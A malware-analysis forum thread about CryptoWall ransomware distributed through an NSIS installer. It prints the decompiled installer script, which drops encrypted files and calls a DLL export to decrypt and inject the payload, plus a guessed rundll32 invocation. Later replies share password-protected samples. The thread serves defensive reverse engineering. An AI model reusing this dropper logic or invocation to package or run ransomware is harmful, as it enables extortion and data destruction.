A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27313  by Grinler
 Wed Nov 25, 2015 11:09 pm
CryptoWall being distributed using a NSIS installer. As explained by Brad Duncan in his ISC handler's diary, cryptowall now being distributed via exploit kits. Payload is a NSIS installer.

Installer contained the files MuskegCommuneKinesthesia, and suppress.navigation.xml, and skiplanes.dll. Sample from Brad's diary is attached to post.

The extracted NSIS installer config is:
Code: Select all
; NSIS script NSIS-3
; Install

SetCompressor /SOLID lzma
SetCompressorDictSize 8

; --------------------
; HEADER SIZE: 8765
; START HEADER SIZE: 300
; MAX STRING LENGTH: 1024
; STRING CHARS: 3171

OutFile [NSIS].exe
!include WinMessages.nsh

InstallDirRegKey HKCU Software\$$R1 $$7
LicenseBkColor /windows


; --------------------
; LANG TABLES: 1
; LANG STRINGS: 78

Name bookworms
BrandingText "Nullsoft Install System v3.0b1"

; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System v3.0b1"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 bookworms
LangString LSTR_3 1033 "Space available: "
LangString LSTR_4 1033 "Space required: "
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_13 1033 "Delete file: "
LangString LSTR_14 1033 "Delete on reboot: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_26 1033 "Remove folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_32 1033 B
LangString LSTR_33 1033 K
LangString LSTR_34 1033 M
LangString LSTR_35 1033 G
LangString LSTR_36 1033 "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)."
LangString LSTR_37 1033 "License Agreement"
LangString LSTR_38 1033 "Please review the license terms before installing $(LSTR_77)."
LangString LSTR_39 1033 "Press Page Down to see the rest of the agreement."
LangString LSTR_40 1033 "Choose Components"
LangString LSTR_41 1033 "Choose which features of $(LSTR_77) you want to install."
LangString LSTR_42 1033 Description
LangString LSTR_43 1033 "Position your mouse over a component to see its description."
LangString LSTR_44 1033 "Choose Install Location"
LangString LSTR_45 1033 "Choose the folder in which to install $(LSTR_77)."
LangString LSTR_46 1033 Installing
LangString LSTR_47 1033 "Please wait while $(LSTR_77) is being installed."
LangString LSTR_48 1033 "Installation Complete"
LangString LSTR_49 1033 "Setup was completed successfully."
LangString LSTR_50 1033 "Installation Aborted"
LangString LSTR_51 1033 "Setup was not completed successfully."
LangString LSTR_52 1033 "MS Shell Dlg"
LangString LSTR_53 1033 8
LangString LSTR_54 1033 "Are you sure you want to quit $(LSTR_2) Setup?"
LangString LSTR_55 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_56 1033 $R1
LangString LSTR_57 1033 Custom
LangString LSTR_58 1033 Cancel
LangString LSTR_59 1033 "< &Back"
LangString LSTR_60 1033 "I &Agree"
LangString LSTR_61 1033 "Click Next to continue."
LangString LSTR_62 1033 "Check the components you want to install and uncheck the components you don't want to install. $_CLICK"
LangString LSTR_63 1033 "Select the type of install:"
LangString LSTR_64 1033 "Or, select the optional components you wish to install:"
LangString LSTR_65 1033 "Select components to install:"
LangString LSTR_66 1033 "&Next >"
LangString LSTR_67 1033 "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK"
LangString LSTR_68 1033 "Destination Folder"
LangString LSTR_69 1033 B&rowse...
LangString LSTR_70 1033 "Select the folder to install $(LSTR_77) in:"
LangString LSTR_71 1033 &Install
LangString LSTR_72 1033 "Click Install to start the installation."
LangString LSTR_73 1033 "Show &details"
LangString LSTR_74 1033 Completed
LangString LSTR_75 1033 " "
LangString LSTR_76 1033 &Close
LangString LSTR_77 1033 bookworms


; --------------------
; VARIABLES: 34

Var _0_
Var _1_
Var _2_
Var _3_
Var _4_
Var _5_
Var _6_
Var _7_
Var _8_
Var _9_
Var _10_
Var _11_
Var _12_
Var _13_
Var _14_
Var _15_
Var _16_
Var _17_
Var _18_
Var _19_
Var _20_
Var _21_
Var _22_
Var _23_
Var _24_
Var _25_
Var _26_
Var _27_
Var _28_
Var _29_
Var _30_
Var _31_
Var _32_
Var _33_


InstType $(LSTR_57)    ;  Custom
InstallDir $TEMP
; wininit = $WINDIR\wininit.ini


; --------------------
; PAGES: 5

; Page 0
Page license func_0 func_3 func_9 /ENABLECANCEL
  LicenseText $(LSTR_36) $(LSTR_60)    ;  "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)." "I &Agree" bookworms
  LicenseData [LICENSE].txt

; Page 1
Page components func_10 func_13 func_27 /ENABLECANCEL
  ComponentsText $(LSTR_62) $(LSTR_63) $(LSTR_64)    ;  "Check the components you want to install and uncheck the components you don't want to install. $_CLICK" "Select the type of install:" "Or, select the optional components you wish to install:"

; Page 2
Page directory func_28 func_31 func_39 /ENABLECANCEL
  DirText $(LSTR_67) $(LSTR_68) $(LSTR_69) $(LSTR_70)    ;  "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK" "Destination Folder" B&rowse... "Select the folder to install $(LSTR_77) in:" bookworms bookworms
  DirVar $CMDLINE

; Page 3
Page instfiles func_40 func_43 func_49
  CompletedText $(LSTR_74)    ;  Completed
  DetailsButtonText $(LSTR_73)    ;  "Show &details"

/*
; Page 4
Page COMPLETED
*/


; --------------------
; SECTIONS: 1
; COMMANDS: 127

Function func_0    ; Page 0, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_37)    ;  "License Agreement"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_38)    ;  "Please review the license terms before installing $(LSTR_77)." bookworms
FunctionEnd


Function func_3    ; Page 0, Show
  FindWindow $_12_ "#32770" "" $HWNDPARENT
  GetDlgItem $_13_ $_12_ 1040
  GetDlgItem $_14_ $_12_ 1006
  GetDlgItem $_15_ $_12_ 1000
  SendMessage $_13_ ${WM_SETTEXT} 0 STR:$(LSTR_39)    ;  "Press Page Down to see the rest of the agreement."
FunctionEnd


Function func_9    ; Page 0, Leave
FunctionEnd


Function func_10    ; Page 1, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_40)    ;  "Choose Components"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_41)    ;  "Choose which features of $(LSTR_77) you want to install." bookworms
FunctionEnd


Function func_13    ; Page 1, Show
  FindWindow $_16_ "#32770" "" $HWNDPARENT
  GetDlgItem $_17_ $_16_ 1006
  GetDlgItem $_18_ $_16_ 1021
  GetDlgItem $_19_ $_16_ 1022
  GetDlgItem $_20_ $_16_ 1017
  GetDlgItem $_21_ $_16_ 1032
  GetDlgItem $_22_ $_16_ 1042
  GetDlgItem $_24_ $_16_ 1043
  GetDlgItem $_25_ $_16_ 1023
  SendMessage $_22_ ${WM_SETTEXT} 0 STR:$(LSTR_42)    ;  Description
  EnableWindow $_24_ 0
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_43)    ;  "Position your mouse over a component to see its description."
  StrCpy $_23_ $(LSTR_43)    ;  "Position your mouse over a component to see its description."
FunctionEnd


Function func_27    ; Page 1, Leave
FunctionEnd


Function func_28    ; Page 2, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_44)    ;  "Choose Install Location"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_45)    ;  "Choose the folder in which to install $(LSTR_77)." bookworms
FunctionEnd


Function func_31    ; Page 2, Show
  FindWindow $_26_ "#32770" "" $HWNDPARENT
  GetDlgItem $_27_ $_26_ 1006
  GetDlgItem $_28_ $_26_ 1020
  GetDlgItem $_29_ $_26_ 1019
  GetDlgItem $_30_ $_26_ 1001
  GetDlgItem $_31_ $_26_ 1023
  GetDlgItem $_32_ $_26_ 1024
FunctionEnd


Function func_39    ; Page 2, Leave
FunctionEnd


Function func_40    ; Page 3, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_46)    ;  Installing
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_47)    ;  "Please wait while $(LSTR_77) is being installed." bookworms
FunctionEnd


Function func_43    ; Page 3, Show
  FindWindow $_33_ "#32770" "" $HWNDPARENT
  GetDlgItem $_34_ $_33_ 1006
  GetDlgItem $_35_ $_33_ 1004
  GetDlgItem $_36_ $_33_ 1027
  GetDlgItem $_37_ $_33_ 1016
FunctionEnd


Function func_49    ; Page 3, Leave
  IfAbort label_53
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_48)    ;  "Installation Complete"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_49)    ;  "Setup was completed successfully."
  Goto label_55
label_53:
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_50)    ;  "Installation Aborted"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_51)    ;  "Setup was not completed successfully."
label_55:
  IfAbort label_56
label_56:
FunctionEnd


Function .onGUIInit
  GetDlgItem $_0_ $HWNDPARENT 1037
  CreateFont $_1_ $(LSTR_52) $(LSTR_53) 700    ;  "MS Shell Dlg" 8
  SendMessage $_0_ ${WM_SETFONT} $_1_ 0
  GetDlgItem $_2_ $HWNDPARENT 1038
  SetCtlColors $_0_ "" 0xFFFFFF
  SetCtlColors $_2_ "" 0xFFFFFF
  GetDlgItem $_3_ $HWNDPARENT 1034
  SetCtlColors $_3_ "" 0xFFFFFF
  GetDlgItem $_4_ $HWNDPARENT 1039
  SetCtlColors $_4_ "" 0xFFFFFF
  GetDlgItem $_6_ $HWNDPARENT 1028
  SetCtlColors $_6_ /BRANDING ""
  GetDlgItem $_5_ $HWNDPARENT 1256
  SetCtlColors $_5_ /BRANDING ""
  SendMessage $_5_ ${WM_SETTEXT} 0 "STR:$(LSTR_0) "    ;  "Nullsoft Install System v3.0b1"
  GetDlgItem $_7_ $HWNDPARENT 1035
  GetDlgItem $_8_ $HWNDPARENT 1045
  GetDlgItem $_9_ $HWNDPARENT 1
  GetDlgItem $_10_ $HWNDPARENT 2
  GetDlgItem $_11_ $HWNDPARENT 3
FunctionEnd


Function .onUserAbort
  MessageBox MB_YESNO|MB_ICONEXCLAMATION $(LSTR_54) IDYES label_80    ;  "Are you sure you want to quit $(LSTR_2) Setup?" bookworms
  Abort
label_80:
FunctionEnd


Function .onInit
  StrCpy $R1 2
label_82:
  DetailPrint $7
  IntCmp $7 13105745 0 0 label_87
  DetailPrint $7
  IntOp $7 $7 + $R1
  Goto label_82
label_87:
  SetOutPath $INSTDIR
  File MuskegCommuneKinesthesia
  File suppress.navigation.xml
  File skiplanes.dll
  StrCpy $R7 MisbehaviourGittern
  StrCpy $6 MuskegCommuneKinesthesia
  System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
    ; Call Initialize_____Plugins
    ; SetOverwrite off
    ; File $PLUGINSDIR\System.dll
    ; SetDetailsPrint lastused
    ; Push "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
    ; CallInstDLL $PLUGINSDIR\System.dll Call
  Quit
FunctionEnd


Section bookworms ; Section_0
  SetOutPath $INSTDIR
  WriteRegStr HKCU Software\$R1 $7 $INSTDIR
SectionEnd


Function .onMouseOverSection
  StrCmp $0 -1 0 label_108
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:
  EnableWindow $_24_ 0
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:$_23_
  Goto label_112
label_108:
  StrCmp $0 0 0 label_112
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:
  EnableWindow $_24_ 1
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_56)    ;  $R1
label_112:
FunctionEnd


/*
Function Initialize_____Plugins
  SetDetailsPrint none
  StrCmp $PLUGINSDIR "" 0 label_123
  Push $0
  SetErrors
  GetTempFileName $0
  Delete $0
  CreateDirectory $0
  IfErrors label_124
  StrCpy $PLUGINSDIR $0
  Pop $0
label_123:
  Return

label_124:
  MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK
  Quit
FunctionEnd
*/



; --------------------
; UNREFERENCED STRINGS:

/*
1 ProgramFilesDir
17 CommonFilesDir
32 "C:\Program Files"
49 $PROGRAMFILES
53 "$PROGRAMFILES\Common Files"
70 $COMMONFILES
*/
MuskegCommuneKinesthesia and suppress.navigation.xml appear to contain encrypted content. I am far from experienced with NSIS, but from the script it appears that CW is being installed via this command:
Code: Select all
 System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
When trying to convert it to a rundll32 line, I think it is something like:
Code: Select all
rundll32.exe skiplanes.dll,Leakage 475 MuskegCommuneKinesthesia .ro "<path_to>\suppress.navigation.xml" MisbehaviourGittern
Something is missing though as executing the above command does not perform the injection/install. Not sure what .r0 represents other than it is supposed to be an integer.

My guess is the leakage function decrypts the contents of the suppress.navigation.xml, which becomes the payload to inject?

I will leave that up to you reversers to figure that part out :)
 #28455  by EP_X0FF
 Thu May 05, 2016 5:44 am
oshi wrote:
henices wrote:Cryptowall 4.0
what is the password for attachment?
infected
 #29181  by flrud2208
 Tue Sep 06, 2016 1:31 am
Sample of cyrptowall for analysis

pass - infected
Attachments
contains exe that was used to drop malware
(251.8 KiB) Downloaded 73 times
 #29184  by xors
 Tue Sep 06, 2016 12:39 pm
Don't we have a thread for it?
Attachments
password:infected
(128.84 KiB) Downloaded 71 times